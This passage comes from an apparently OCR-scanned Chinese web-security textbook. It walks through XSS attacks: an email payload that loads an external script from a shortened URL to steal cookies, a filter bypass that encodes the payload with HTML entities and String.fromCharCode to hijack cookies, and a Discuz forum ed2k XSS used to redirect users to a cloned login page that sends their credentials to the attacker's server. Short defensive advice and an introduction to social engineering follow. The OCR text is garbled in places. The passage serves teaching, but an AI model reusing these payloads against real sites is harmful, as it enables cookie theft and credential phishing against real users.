即使 是 在 不 经 意 间 ， 那 么 攻击 者 就 可 以 试 着 构造 出 这 样 一 个 语句 : 

<b on mouseout-alert (1) > 向 下 翻 看 : ...... hahaha....... </b> 


再 次 尝试 ， 结 果 如 图 6-36 所 示 。 





图 6-36 ”成功 触发 XSS 


从 图 6-36 可 以 看 到 ， 在 鼠标 指针 移动 到 文字 上 方 再 拿 开 的 瞬间 ，JavaScript 脚 本 被 触发 
了 ， 再 试 着 构造 cookie 动 持 。 


<b onmouseout-s-createElement('script');body.appendChild(s);s. 
src-'http://t.cn/R7EtYil';»lalalallalalalala«c/b» 


当 收 件 人 打开 邮件 并 将 鼠标 滑 过 攻击 者 设计 的 文本 内 容 后 ， 查 看 XSS 平 台 可 以 看 到 ， 
cookie 已 经 非常 顺利 地 落 入 我 们 平台 中 了 ， 如 图 6-37 所 示 。 






图 6-37 查看 XSS 平 台 
6.4.3 一 次 简单 的 绕 过 ( bypass ) 演示 
在 上 面 的 内 容 中 ， 已 经 分 别 挑战 了 反射 和 邮箱 的 标准 语句 XSS， 却 还 没有 经 历 过 和 
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设置 过 过 滤 脚 本 的 XSS 输 入 点 。 可 是 当 亲 自 下 手 去 挖掘 XSS 时 却 会 发 现 ， 大 多 数 可 以 编辑 
HTML 的 位 置 都 针对 JavaScript 的 执行 进行 了 过 滤 和 限制 ， 这 是 因为 XSS 现 今 也 已 经 引起 了 
各 大 厂商 的 注意 ， 并 努力 提升 安全 环境 的 成 果 。 然 而 有 些 情况 下 ， 纵 使 厂商 已 经 进行 了 过 
滤 ， 仍 然 可 以 通过 对 插入 语句 的 一 些 变形 绕 过 它们 。 下 面 就 来 看 一 个 反射 型 XSS 的 绕 过 ， 
也 就 是 bypass。 事 实 上 ， 除 了 过 滤 脚本 以 外 ， 还 有 一 些 功能 本 身 也 可 能 构成 障碍 ， 正 如 下 
面 将 要 演示 的 一 例 。 

当 怀疑 页 面 处 存在 XSS 输 入 点 时 ， 笔 者 往往 会 先 提交 一 个 <br>123<br> 来 查看 是 否 能 
插入 大 于 号 和 小 于 号 。 如 果 可 以 ， 那 么 XSS 成 功 的 希望 就 只 能 寄托 于 被 输出 到 JavaScript 内 
的 参数 了 。 让 人 欣慰 的 是 ， 此 处 并 没有 过 滤 大 于 号 小 于 号 ， 可 以 看 到 ， 输 出 已 经 错位 了 。 
而 反射 型 XSS 中 ， 没 有 过 滤 尖 括号 就 意味 着 成 功 了 80%， 如 图 6-38 所 示 。 

该 网 站 并 没有 过 滤 尖 括号 ， 接 下 来 可 以 进一步 测试 了 ， 先 插入 一 条 测试 语句 : 
<script>alert(1)</script>。 

结果 出 现 了 如 图 6-39 所 示 的 页 面 ， 那 么 是 不 是 意味 着 此 处 没有 XSS 输 入 点 的 存在 呢 ? 
答案 显然 是 否定 的 。 


Hes SG, ӘН abt cH 





Hje-38 ”检测 是 否 过 滤 尖 括号 图 6-39 ”插入 测试 
继续 测试 ， 提 交 一 个 正常 参数 后 看 页 面 返回 情况 ， 如 图 6-40 所 示 。 
没有 问题 ， 这 说 明 搜索 功能 不 存在 设计 错误 ， 下 面 就 应 当 思考 一 下 是 哪个 ， 或 者 哪些 
语句 触发 了 错误 呢 ? 首先 怀疑 的 自然 是 <script> 标 签 ， 这 里 把 它 换 掉 ， 用 <marquee> 标 签 来 
代替 ， 看 看 搜索 结果 如 何 〈 见 图 6-41) 。 





专栏 文章 

















图 6-40 ”提交 正常 参数 图 6-41 标签 测试 
没 想到 <marquee>123</marquee> 居 然 也 被 过 滤 掉 了 ， 如 果 对 <marquee> 标 签 都 进行 了 
过 滤 ， 这 个 过 滤 脚 本 就 有 点 犀利 了 。 但 笔者 仔细 一 想 ， 单 标签 <br> 的 插入 毫 无 问题 ， 兴 
许 是 斜 本 导致 了 过 滤 ， 当 然 ， 除 此 以 外 0 的 嫌疑 也 还 没有 排除 ， 所 以 可 以 尝试 分 别 插入 测 
试 ， 括 号 果然 导致 了 过 滤 ， 再 次 看 到 如 图 6-42 所 示 的 页 面 。 


— m — 


EN U mESzeHdd 


您 访问 的 而 面 不 存在 ， 点 市 这 里 返 回首 页 或 者 DPBRENMSESDRIS. == 


6-42 ”语句 被 过 滤 
可 是 使 用 <marquee> 插 入 的 时 候 并 没有 括号 ， 而 事实 证 明 ， 单 独 插入 斜 杠 或 者 插入 
/test 却 并 没有 引起 错误 ， 如 图 6-43 所 示 。 











/search//test/ 





新 间 资 读 
图 6-43 ”检测 斜 杠 是 否 过 滤 

这 让 笔者 的 思路 一 顿 ， 但 立刻 又 开朗 起 来 ， 可 以 看 出 ， 这 里 提交 的 斜 杠 似乎 被 当 作 做 
目录 中 的 斜 杠 处 理 了 ， 再 插入 test/test， 果 然 如 此 ! 

既然 这 样 ， 不 妨 插 一 个 不 使 用 斜 杠 的 单 标签 来 触发 XSS， 既 然 无 法 用 <script>， 就 只 
好 用 HITML 的 事件 属性 了 。 这 时 笔者 又 想到 一 个 问题 : 括号 无 法 处 理 。 这 里 为 何 会 过 滤 括 
号 呢 ? 笔者 有 些 奇 怪 ， 重 新 插入 了 一 个 〈12) ， 没 想到 居然 没有 显示 404 界 面 ， 这 使 笔者 
备 受 鼓 舞 ， 随 后 找到 了 一 个 不 带 有 和 斜 杠 的 XSS 语 句 : <img src=x onerror=alert(1)>。 

这 里 的 src 属 性 赋值 为 x 自然 会 出 错 ，onerror 事 件 检测 到 这 个 错误 后 便 触 发 了 后 面 的 
alert(]) 语 句 ， 经 过 测试 ， 果 然 成 功 了 ， 如 图 6-44 所 示 。 


[T EE” 








图 6-44 成功 触发 XSS 
不 过 现在 高 兴 还 太 早 ， 因 为 在 存在 障碍 的 情况 下 加 载 外 部 脚本 实现 cookie 动 持 将 变 得 
更 为 困难 。 
先 来 整理 一 下 思路 。 
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现在 用 以 触发 JavaScript 语 句 的 环境 已 经 设计 好 了 ， 即 : 

http:// /search/<img src-X onerror=【 待 设计 的 Js 语句 ] >/ 

看 起 来 似乎 不 是 很 复杂 ， 因 为 原本 onerror 事 件 就 可 以 用 于 创建 节点 并 加 载 外 部 脚本 。 

<img src-xonerror-s-createElement(' script'); body.appendChild(s); ѕ.ѕгс= ' 你 的 JS 地 
Ш';> 

但 读者 应 该 也 意识 到 了 ， 如 果 想 要 标识 存放 在 网 络 上 的 外 部 脚本 ， 在 引用 其 地 址 时 就 
一 定 会 用 到 /， 和 斜 杠 出 现在 标签 中 部 将 会 出 现 问题 ， 所 以 我 们 可 以 尝试 将 onerror 事 件 属性 
后 的 JS 脚本 进行 十 六 或 十 进 制 编码 ， 最 终生 成 一 个 这 样 的 语句 。 


«img src-X опеггог=&#х73;&#х30;&#х63;&#х72;&#х65;&#х61;&#х74;&#х65; 
&1$x45; &Ex6C; &#х65; &EX6D; &#х65; &EX6E; &Ex 74; &£x28; &£x27; &1x73; &1x63; &x 72; 
&#х69; &#х70; &#х74; &#х27; &Ex29; &$x3B; &#х62; &EXGF; &$x64; &1x79; &EX2E; &$x61; 
&Tx70; &£x70; &$x65; &Ex6E; &$x64; &$x43; &#х68; &#х69; &#х6С; &$x64; &£x28; &$x73; 
&#х29; &#х3В; &$x73; &EX2E; &#х73; &$x12; 6#х63; &EX3D; &$x27; 6#х68; &#х74;&#х74; 
&#х70;&#хЗА;&Ё#х2Е;&#х2Е;&#х74;&Ё#х2Е;&#х63;&#хбЕ;&#х2Е;&#х52;&#х37;&#х52; 
&#х62;&#х4С;&#х4С;&#х74;&#х27;&#х3В;> 


这 样 编码 看 似 已 经 绕 过 了 和 斜 本 ， 然 而 却 遭 遇 
了 另外 一 种 不 幸运 ， 如 图 6-45 所 示 。 

这 个 错误 提示 页 面 再 次 出 现 ， 根 据 后 面 进 一 
步 测试 发 现 & 也 被 过 滤 了 ， 于 是 从 编码 方法 也 无 
从 下 手 了 。 





还 好 ， 安全 的 世界 里 没有 绝对 ， 一 种 方法 的 您 访问 的 页面 不 有 在 ， 点 击 这 里 过问 甘 抽 或 者 
失败 也 许 预示 着 另 一 种 方法 的 成 功率 的 增加 。 再 图 6-45 ”加 载 外 部 脚本 
尝试 用 JavaScript 方 式 对 和 斜 杠 转 码 来 bypass 吧 。 

根据 原先 的 指令 : 


«img src-x onerror-s-createElement ('script');body.appendChild(s); 


S.Src-"http://t.cn/R7RGKwj";» 


这 里 使 用 String.fromCharCode() 函 数 来 把 整个 URL 部 分 进行 一 个 变形 ， 将 http://t.cn/ 
R7RGKwj 转 换 为 String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 116, 46, 99, 110, 47, 82, 
55, 82, 71, 75, 119, 106); 的 形式 ， 因 为 在 JavaScript 运 行 时 ， 它 将 会 被 重新 变 回 原来 的 URL 
地 址 。 

这 样 一 来 就 顺利 了 ， 最 终 构造 出 恶意 链接 地 址 。 


http://www..cn/search/$3Cimg$20src-x$200nerror-s-createElement$28$27 
Script$27$29;body.appendChild$28s$29;s.src-String.fromCharCode$28104, 
116,116,112,58,47,47,116,46, 99,110, 47, 82, 55,82, 71, 75,119, 106829; $3E/ 
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受害 者 打开 这 个 链接 以 后 ， 看 一 下 攻击 者 的 平台 ， 如 图 6-46 所 示 。 





图 6-46 查看 XSS 平 台 
可 以 看 到 已 经 成 功 劫持 到 的 cookie， 就 这 样 攻击 者 成 功 bypass 了 这 个 “麻烦 ”的 反射 
型 XSS。 


644 ”利用 XSS 进 行 钓鱼 攻击 


XSS 漏 洞 原因 : ed2k 协 议 漏洞 ， 这 个 是 Discuz X3.1 前 版 本 的 漏洞 ， 漏 洞 成 因 将 会 在 
Web 渗 透 与 代码 审计 章节 详细 说 明 。 因 为 这 个 站 的 密码 用 MD5 加 密 ， 还 加 了 http_only 标 
签 ， 所 以 最 便捷 的 攻击 方式 就 是 XSS 钓 鱼 了 。 这 个 漏洞 的 详细 成 因 在 代码 审计 章节 中 已 经 
分 析 完 毕 。 下 面 来 重 现 一 下 如 何 利用 这 个 XSS 漏 洞 进行 钓鱼 攻击 。 

该 漏洞 已 提交 漏洞 平台 并 修复 。 

首先 找到 这 个 论坛 的 登录 页 面 ， 在 右上 角 随 便 输入 一 个 用 户 名 和 密码 就 能 进入 登录 专 
用 的 页 面 ， 如 图 6-47 所 示 。 

然后 审查 元 素 把 相关 的 资源 都 下 载 下 来 ， 也 可 以 在 审查 元 素 的 Network 页 面 下 刷新 ， 
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图 6-47 ”论坛 登录 界面 图 6-48 下载 相关 资料 
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然后 用 Dreamweaver 修 改 HITML 人 代码， 改 的 时 候 注意 考虑 一 下 要 怎样 实施 钓鱼 ， 笔 者 
想到 了 两 种 方式 : 

(1) 清空 原 页 面 的 东西 然后 加 载 钓 鱼 页 面 的 元 素 。 

> 优点 ; 地 址 栏 地 址 不 会 变 ， 仍 在 一 个 域名 下 不 容易 引起 怀疑 。 

> 缺点 : JS 的 document 没 办 法 访问 <head> 标 签 下 的 元 素 ， 所 以 我 们 要 把 载 入 CSS、 编 
码 、 载 入 JS 等 都 写 在 <body> 里 ， 而 且 如 果 原 页 面 在 <head> 里 定义 了 背景 ， 那 么 清 
空 <body> 并 重 写 ， 之 后 样式 不 太 好 做 。 

(2) XSS 后 跳 转 到 另 一 个 域 下 的 页 面 。 

> ЖА: 不 需要 对 源码 进行 大 改动 ， 还 原 度 高 。 

> 缺点 : 地 址 栏 里 能 看 到 跳 转 的 地 址 ， 细 心 的 人 或 了 解 安全 技术 的 人 会 发 现 域名 不 
对 ， 会 留心 一 下 。 

在 这 里 笔者 选择 了 第 2 种 方式 。 

在 考虑 这 两 种 方法 之 前 先 看 一 下 这 个 注入 点 的 特性 。 

发 帖 的 时 候 包含 这 各: 

ed2k: //ffilellovely| '+ 想 要 执行 的 JS 代码 +'"|test 

将 JS 代码 写 到 加 号 中 间 就 能 XSS， 如 图 6-49 和 图 6-50 所 示 。 








编外 帖子 
jos8.3 可 以 用 又 又 助手 起 不 么 ? 还 可 给 入 41 个 字符 

字体 -| 大 小 - -0 йҥк=з ә = “йада 
в тц A 720064 HHBI-I s mH о E ШӘ 


如 题 ,los8.3 可 以 用 又 又 助手 越狱 么 ? 
ed2k://|fle|lovely|'+alert(123)+'|test/ 


SARAS 





图 6-49 ” 跳 转 到 另 一 个 域 下 的 XSS 测 试 






ios8.3 可 以 用 叉 叉 助手 越狱 么 ? 


IRE EE 











如 题 ,ios8.3 可 以 用 又 又 助手 越狱 么 ? 


lovely (+akert(123)+' Bytes) 








图 6-50 ”测试 结果 
但 是 中 间 揪 入 的 JS 代码 不 能 含有 各 种 引号 ， 这 样 会 闭合 | ¿= ssim 
payload 中 的 引号 导致 JS 不 能 正确 执行 ， 如 图 6-51 所 示 ， 没 有 Quee 
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按 F12 键 能 看 到 这 里 的 情况 。 图 6-51 加 入 引号 
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这 个 XSS 很 鸡肋 ? No No No， 这 里 可 以 用 HTML 的 <script> 标 签 来 测试 。 


<script src-htbp://- -- »«/scrpit» 


可 以 看 到 这 个 方法 不 需要 使 用 引号 就 能 合法 加 载 外 部 JS 脚本 ， 但 是 直接 写 上 面 的 代码 
的 话 尖 括号 会 被 转 义 ， 于 是 我 们 这 样 使 用 : 


ed2k://|file|lovely|'+document.write (String.fromCharCode (这 里 使 用 ASCII 
码 ))+'|test/ 


在 String.fromCharCode 的 参数 里 填 入 原来 想 要 加 载 的 payload 的 ASCII 码 ， 比 如 <script 
SIc=http://.….></scrpit> 这 句 话 的 ASCII 码 如 下 。 


60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47, 
46,46,46,46,46,46,46,46,46,46,46,46,62,60,47,115,99,114,112,105,116,62 
( 十进制 ) 


所 以 构造 代码 如 下 。 


ed2k://|file|lovely|'«document.write (String.fromCharCo de(60,115,99,114, 
105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,46,46,46,46,46, 46, 46, 
46,46,46,46,46,62,60,47,115,99,114,112,105,116,62))* '|test/ 


这 样 我 们 就 没有 使 用 双 引 号 载 入 外 部 JS 。 

下 面 介 绍 上 文中 两 种 方法 的 实现 过 程 。 

(1) 第 一 种 方法 。 首 先 把 HTML 中 <head> 里 加 载 的 CSS 样 式 、JS 脚 本 移 到 <body> 中 
( 拖 到 最 前 面 ， 让 它 先 加 载 ) ， 然 后 使 用 documentbody innerHTML0 的 方式 将 <body> 标 签 
中 的 元 素 修改 为 登录 页 面 的 样式 ， 这 里 就 不 详细 介绍 了 。 

为 什么 笔者 放弃 了 这 种 方法 呢 ， 一 个 是 <body> 标 签 中 的 JS 无 法 直接 访问 <head> 标 签 
中 的 元 素 ， 所 以 不 能 删除 背景 ， 只 能 用 一 个 白色 的 层 遮 住 原来 的 页 面 。 当 然 这 只 是 一 个 问 
题 ， 还 有 一 个 问题 是 String.fromCharCode() 参 数 如 果 是 中 文 的 ASCII 码 时 可 能 会 导致 乱码 ， 
这 种 方法 的 特点 在 于 不 会 跳 转 域名 ， 所 以 不 容易 被 察觉 。 

(2) 第 二 种 方法 。 在 外 部 载 入 的 JS 中 利用 windowlocation href=http://... : 的 方式 跳 转 到 自 
己 存放 钓鱼 页 面 的 地 址 (此 处 没有 在 payload 中 实现 ， 请 读者 思考 一 下 ， 为 什么 ? ) 。 

然后 将 钓鱼 页 面 的 HTML 修 改 一 下 按钮 的 JS 代 码 。 

找到 注册 侦 听 的 位 置 ， 如 图 6-52 所 示 。 执 行 这 个 函数 ， 如 图 6-53 所 示 。 


























$(".submit").click( login Е function login(){ 
图 6-52 ”注册 侦 听 的 位 置 图 6-53 ”执行 函数 


把 login 里 的 内 容 改 成 把 账号 、 密 码 输入 框 内 的 东西 并 发 送 到 自己 的 服务 器 ， 发 送 完 了 
让 页 面 再 跳 转 到 论坛 主页 ， 让 这 次 钓鱼 不 会 被 怀疑 。 
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注意 : 跳 转 页 面 的 时 候 一 定 要 注意 ， 不 要 把 跳 转 的 代码 接着 发 送 ， 如 果 发 送 没有 执 
行 完 就 跳 转 是 不 会 发 出 包 的 ， 所 以 我 们 要 用 setTimeout(function, time); 的 方式 延迟 跳 
转 。 笔 者 在 一 开始 跳 转 到 钓鱼 页 面 的 时 候 还 让 它 弹 了 个 窗口 说 “登录 状态 异常 ， 请 重 
新 登录 ”， 然 后 又 传 了 cookie data refer 等 数据 (这 里 没有 用 ， 是 因为 不 在 同一 个 域 ， 这 
个 cookie 不 是 论坛 的 ， 不 过 读者 可 以 在 第 一 次 跳 转 前 就 顺便 发 过 来 ， 这 样 就 是 论坛 下 的 
cookie 了 ) 。 

然后 我 们 就 能 收 到 钓鱼 页 面 发 送 来 的 信息 了 。 

如 果 帖 子 需要 审核 ， 那 么 管理 员 打 开 帖 子 的 时 候 就 会 触发 XSS， 第 一 个 被 击 中 的 就 会 
是 管理 员 的 号 。 

(1) 触发 了 XSS， 如 图 6-54 所 示 。 



































86-54 触发 KSS 
(2) 跳 转 进 入 了 钓鱼 页 面 ， 可 以 看 到 域名 发 生 了 变化 ， 如 图 6-55 所 示 。 
G) 输入 用 户 名 和 密码 ， 如 图 6-56 所 示 。 





XXE 


36 Edit vos o o 


ahcd123456 











图 6-55 Hanm 图 6-56 输入 用 户 名 与 密码 
单 击 “ 立 即 登入 ”按钮 之 后 ， 页 面 就 向 服务 端 发 送 了 账号 和 密码 并 跳 转 到 了 论坛 首 
页 ， 如 图 6-57 所 示 。 
查看 一 下 得 到 的 信息 ， 如 图 6-58 所 示 。 
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la/5. s NT 6.1; WOW64; Trider nif. 0; isch: m ах 
ter PC 6-0 Meo. СМЕТА. OE; гу:11.0) 


login. html'，toplocation' :'http:/; 





login.htnl',' cookie’ 277, domain’ :* 


图 6-58 ”查看 得 到 的 信息 
如 果 不 会 写 服务 端 和 发 送 数 据 ， 可 以 参考 一 下 网 上 的 例子 ， 也 可 以 修改 XSS 探 针脚 本 
xssprobe 的 源码 (网 上 可 以 找到 ) 。 
至 于 如 何 防御 这 种 基于 钓鱼 页 面 的 攻击 ， 第 2 章 中 有 详细 说 明 ， 各 位 不 妨 带 着 新 知识 
翻 回去 再 复习 一 遍 。 


前 端 防御 


相信 大 家 现在 对 前 端 漏洞 的 形成 原因 和 攻击 的 方法 都 有 了 一 定 的 了 解 ， 只 有 熟悉 了 
“攻击 ”， 才 能 更 加 深入 地 了 解 “防御 ”， 毕 竟 ， 防 御 总 是 比 攻击 困难 。 接 下 来 将 进入 防 
御 环节 的 学 习 。 

防御 前 端 攻 击 的 主要 角度 有 3 个 。 


1. Web 端 防御 


Web 端 防御 即 在 Web 层 面 、 代 码 层面 杜绝 XSS 形 成 ， 在 编写 程序 时 应 该 谨慎 处 理 每 一 

个 最 终 会 被 输出 至 页 面 的 参数 ， 时 刻 牢记 任何 来 自用 户 的 输入 都 可 能 是 不 可 信 的 ， 对 常规 

参数 ， 如 <、>、= 等 敏感 符号 进行 过 滤 ， 操 作 富 文本 元 素 时 ， 针 对 <scrip 伺 标签 以 及 类 似 

onload、onerror 等 常用 JS 事 件 元 素 进 行 过 滤 ， 以 杜绝 恶意 ]S 的 执行 ， 同 时 网 络 上 已 经 出 现 
了 很 多 有 效 的 、 高 质量 的 XSS 过 滤 脚 本 ， 可 以 直接 引用 。 
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2. 用 户 防御 


前 端 漏洞 不 同 于 注入 攻击 等 漏洞 ， 它 们 中 的 一 些 漏洞 〈 例 如 反射 型 XSS) 在 一 定 程度 
上 还 是 要 依靠 用 户 的 人 为 触发 ， 所 以 作为 用 户 ， 安 全 意识 也 必 不 可 少 。 

目前 主要 的 攻击 方式 是 在 看 似 可 信 的 网 站 中 插入 恶意 JS 代码 执行 ， 常 常 让 人 防 不 胜 
防 ， 所 以 养 成 一 个 警惕 的 上 网 习惯 非常 重要 ， 例 如 : 

CD 不 要 轻易 打开 莫名 其 妙 的 邮件 ; 

(2) 不 打开 陌生 人 发 送 的 不 可 信和 链接; 

(3) 不 轻易 打开 被 大 量 转发 的 帖子 凑热闹 〈 因 为 那 可 能 是 黑客 释放 出 的 一 个 XSS 蠕 
m. 

总 地 来 说 ， 在 前 端 攻击 面前 用 户 可 以 保护 自身 的 手段 少 之 又 少 ， 有 时 仍然 是 防 不 胜 
防 ， 所 以 我 们 还 是 应 当 把 期 许 的 目光 放 在 互联 网 安全 事业 的 发 展 上 ， 也 希望 读者 学 完 本 章 
可 以 理解 这 一 现状 ， 为 改善 互联 网 安全 尽 一 份 力所能及 的 力量 。 


3. 浏览 器 防御 


随 着 前 端 安全 问题 越 来 越 受 重视 ， 浏 览 器 厂商 们 也 开始 行动 起 来 ， 试 图 为 用 户 提供 更 
加 安全 的 上 网 环境 ， 正 浏览 器 的 XSS filter 和 Chrome 浏 览 器 的 XSS auditor 已 经 可 以 有 效 地 限 
制 反射 型 XSS 攻 击 ， 如 果 读 者 是 一 个 注重 安全 的 人 ， 把 你 的 默认 浏览 器 设置 成 Chrome 将 会 
是 一 个 非常 明智 的 选择 ， 因 为 大 多 数 基于 前 端 攻击 的 恶意 链接 在 它 面前 都 可 能 束手无策 。 
也 希望 在 浏览 器 厂商 的 积极 配合 下 ， 前 端 安 全 问题 在 未 来 的 几 年 内 可 以 成 为 历史 ， 让 人 们 
的 上 网 环境 在 安全 层面 上 变 得 更 加 无 懈 可 击 。 


66 ”本 章 小 结 


前 端 安全 之 旅 到 这 里 就 告 一 段落 了 ， 本 章 简要 介绍 了 HTML 语 法 和 在 页 面 中 调用 
JavaScript 的 方法 ， 并 深入 浅 出 地 介绍 了 XSS 和 CSRF 攻 击 的 作用 。 相 信 几 个 实战 案例 能 够 
帮助 读者 更 加 直观 地 理解 XSS 攻 击 ， 也 便于 感 兴趣 的 读者 更 快 上 手 。 最 后 我 们 分 析 了 防御 
前 端 攻击 的 一 些 方法 。 

值得 一 提 的 是 ，XSS 和 CSRF 远 不 是 前 端 安全 的 全 部 ， 基 于 XML 的 XXE 攻 击 等 内 容 在 
本 章 中 都 尚未 提 到 。 安 全 领域 博大 精深 ， 没 有 什么 人 能 全 方面 地 掌握 所 有 技能 ， 技 在 于 
精 ， 精 在 于 勤 ， 还 希望 读者 多 加 练习 。 也 希望 通过 本 章节 了 解 攻击 的 内 容 ， 从 而 知道 如 何 
保护 自己 的 个 人 隐私 ， 能 够 对 那些 潜在 的 威胁 防 患 于 未 然 。 
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黑客 们 往往 对 世界 有 着 自己 一 套 独特 的 视角 ， 当 恶意 攻击 通过 纯粹 的 计算 机 技术 手段 
无 法 达到 目的 时 ， 高 超 的 情商 将 会 取代 智商 成 为 进一步 打开 突破 口 的 利器 ， 而 研究 这 些 恶 
意 攻击 行为 的 安全 人 员 们 同样 会 跟 进 这 些 特 殊 且 神秘 的 手段 ， 长 此 以 往 便 形成 了 一 套 安全 
领域 独特 的 理论 : 社会 工程 学 (Social Engineering, WRAL) 。 本 章 将 带 读者 揭 开 社 
会 工程 学 的 神秘 面纱 ， 领 略 它 的 风采 ， 同 时 介绍 一 些 社会 工程 学 环节 中 常用 的 技巧 ， 这 
些小 技巧 如 果 应 用 到 日 常生 活 中 ， 还 能 帮助 你 在 学 习 、 生 活 和 工作 中 取得 某 些 意 想不到 的 
优势 。 





工程 学 


说 起 社会 工程 学 ， 我 们 必须 先 将 其 与 以 研究 社会 事实 为 根基 并 带 着 浓 浓 学 术 气息 的 社 
会 学 加 以 区 分 ， 虽 然 两 者 的 理论 基础 都 衍生 自 人 类 社会 ， 但 作为 一 门 工程 学 科 ， 社 会 工程 
学 更 强调 对 于 每 个 个 体 和 特定 环境 下 有 限 集合 的 人 群 进行 研 究 ， 追 求实 际 应 用 的 效果 而 非 
理论 本 身 。 从 安全 人 员 的 角度 来 看 其 核心 思想 可 以 用 一 句 很 经 典 的 台词 总 结 : 一 个 安全 体 
系 中 最 薄弱 的 环节 永远 是 人 。 随 着 系统 的 不 断 完善 ， 防 御 力度 的 不 断 增强 ，“ 人 ”这 一 环 
节 慢 慢 变 成 整个 系统 中 最 容易 被 利用 的 存在 ， 以 人 和 社会 行为 为 研究 对 象 从 而 发 现 漏洞 并 
实现 突破 的 方案 和 技巧 ， 总 结 其 中 的 规律 并 扩展 利用 范围 ， 总 是 能 够 给 恶意 攻击 者 带 来 意 
想不到 的 惊喜 。 为 了 能 让 读者 对 社会 工程 学 攻击 有 一 个 更 直观 的 了 解 ， 笔 者 将 在 后 面 的 篇 
幅 中 将 社会 工程 学 攻击 中 最 常见 的 方式 加 以 分 类 ， 并 穿插 介绍 实际 应 用 的 技巧 。 

首先 明确 几 个 要 点 。 


1. 什么 是 社会 工程 学 


在 这 门 学 问 被 称 为 社会 工程 学 之 前 ， 它 还 是 一 个 零散 的 集合 体 ， 集 合 了 心理 学 、 社 会 
学 以 及 很 多 有 关 “ 人 ”的 学 问 。 后 来 凯 文 。 米 特 尼 克 (Kevin David Mitnick) 提出 “社会 
工程 学 ”这 个 概念 ， 这 门 学 问 最 吸引 人 的 地 方 莫 过 于 它 可 以 使 人 顺从 你 的 意愿 ， 然 后 告诉 
你 想 知 道 的 信息 或 是 按照 你 的 意愿 去 做 某 些 事 ， 这 确实 很 奇妙 ， 却 又 令 人 不 寒 而 栗 ， 在 安 
全 领域 的 作用 也 是 不 言 而 喻 。 


2. 社会 工程 学 是 否 只 是 一 种 欺骗 的 技巧 呢 


看 到 社会 工程 学 的 定义 ， 有 些 人 可 能 会 认为 社会 工程 学 不 就 是 一 种 骗 人 的 技巧 吗 ? 其 
实 社 会 工程 学 包括 很 多 不 同 的 形式 ， 它 的 确 是 一 种 技巧 ， 但 并 非 是 一 种 欺骗 的 技巧 。 笔 者 
曾 在 某 计 算 机 相关 论坛 中 随机 发 放 了 100 份 关于 社会 工程 学 的 调查 问卷 ， 有 意思 的 是 ， 接 
近 七 成 的 人 认为 社会 工程 学 就 是 利用 他 人 的 好 奇 心 、 好 胜 心 甚至 同情 心 来 进行 欺骗 ， 但 实 
际 上 社会 工程 学 的 用 途 并 不 是 负面 的 ， 它 是 一 种 无 正 负 属性 的 技艺 ， 全 看 使 用 它 的 人 来 赋 
予 它 何 种 意义 。 


— 2 — 


_ 第 7 章 “ 初 识 社会 工程 学 一 bug 出 在 人 身上 = Г 





3. 社会 工程 学 离 我 们 的 生活 有 多 远 


相信 读者 应 该 能 猜 到 答案 。 没 错 ! 社会 工程 学 在 我 们 的 生活 中 无 处 不 在 。 医 生 在 询 
问 病情 的 时 候 你 已 经 赋予 了 他 “权限 ”， 他 知道 了 你 的 私人 信息 ; 销售 人 员 则 在 推销 产品 
时 ， 不 经 意 间 就 会 用 到 心理 学 等 方式 来 促使 人 们 产生 购买 某 种 产品 的 欲望 ， 这 些 都 是 社会 
工程 学 在 生活 中 的 体现 ， 社 会 工程 学 无 处 不 在 。 


4. 为 什么 要 掌握 社会 工程 学 


正如 服务 器 安全 是 建立 在 对 服务 器 的 渗透 测试 上 一 样 ， 人 的 安全 也 要 建立 在 了 解 社会 
工程 学 之 上 ， 大 多 数 被 攻击 的 人 都 缺乏 安全 意识 ， 甚 至 根本 不 知道 社会 工程 学 为 何 物 ， 而 
攻击 者 正好 利用 这 个 bug 趁 虚 而 入 ， 进 行 攻击 。 社 会 工程 学 可 以 让 人 们 对 社交 有 一 种 新 的 
视角 ， 增 强人 们 在 社交 方面 的 各 种 能 力 ， 了 解 并 掌握 社会 工程 学 ， 不 仅 能 帮助 人 们 防御 攻 
击 ， 还 能 给 人 们 的 社会 生活 带 来 很 大 益处 。 


5. 如 何 熟练 掌握 社会 工程 学 


社会 工程 学 涉及 人 性 的 优点 与 弱点 ， 如 果 想 熟练 掌握 社会 工程 学 ， 就 需要 各 种 相关 知 
识 ， 例 如 心理 学 、 密 码 学 、 逻 辑 学 等 ， 也 必须 阅读 一 些 其 他 方面 的 相关 书籍 ， 例 如 卡耐基 
的 《人 性 的 弱点 》、Christopher Hadnagy 的 《社会 工程 一 一 安全 体系 中 的 人 性 漏洞 》 等 著 
作 。 另 外 一 定 要 有 意识 地 培养 自己 的 换 位 思考 能 力 ， 这 种 能 力 在 社会 工程 学 中 起 着 十 分 重 
要 的 作用 。 





72 “社会 工程 学 的 基本 步骤 


社会 工程 学 讲究 逻辑 性 ， 所 以 一 套 完备 的 流程 显得 尤为 重要 ， 接 下 来 一 起 看 看 社会 工 
程 学 所 涉及 的 知识 。 


721 信息 搜集 


“ 知 彼 知己 ， 百 战 不 殉 ”，《 和 孙子 兵法 》 中 的 这 名 名言 用 在 这 里 十 分 恰当 。 从 古代 
开始 ， 人 们 就 了 解 到 信息 情报 的 价值 ， 在 “兵力 ”相当 的 情况 下 ， 信 息 搜集 就 是 制胜 的 关 
键 。 那 么 对 于 一 次 社会 工程 学 活动 ， 基 本 流程 是 什么 ? 总 的 来 说 ， 就 是 获得 尽 可 能 详细 的 
信息 情报 ， 伪 装 成 一 个 “特定 身份 ”， 人 掌握 足够 的 专业 术语 ， 对 事情 过 程 的 逻辑 链 进行 分 
析 预 测 ， 知 悉 和 “目标 ”接触 中 所 需要 问 的 问题 或 者 需要 操纵 的 事情 ， 突 发 事件 的 即时 应 
对 以 及 最 后 如 何 收场 。 要 说 其 中 最 重要 的 环节 ， 必 然 是 信息 搜集 了 ， 信 息 搜 集 是 完成 一 
次 社会 工程 学 活动 的 基础 条 件 ， 对 信息 的 掌握 程度 在 一 定 程度 上 直接 影响 了 社工 活动 的 
进程 。 
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至 于 如 何 进行 信息 搜集 ， 除 了 在 第 3 章 中 已 经 学 习 的 基本 信息 搜集 以 外 ， 社 交 网 络 信 
息 搜集 在 社会 工程 方面 的 应 用 更 为 广泛 。 一 个 人 在 网 络 上 总 会 留 下 痕迹 ， 而 信息 搜集 要 做 
的 就 是 找到 这 些 痕 迹 ， 并 通过 分 析 这 些 痕迹 来 得 到 更 多 的 关于 目标 的 信息 。 姓 名 、 电 话 、 
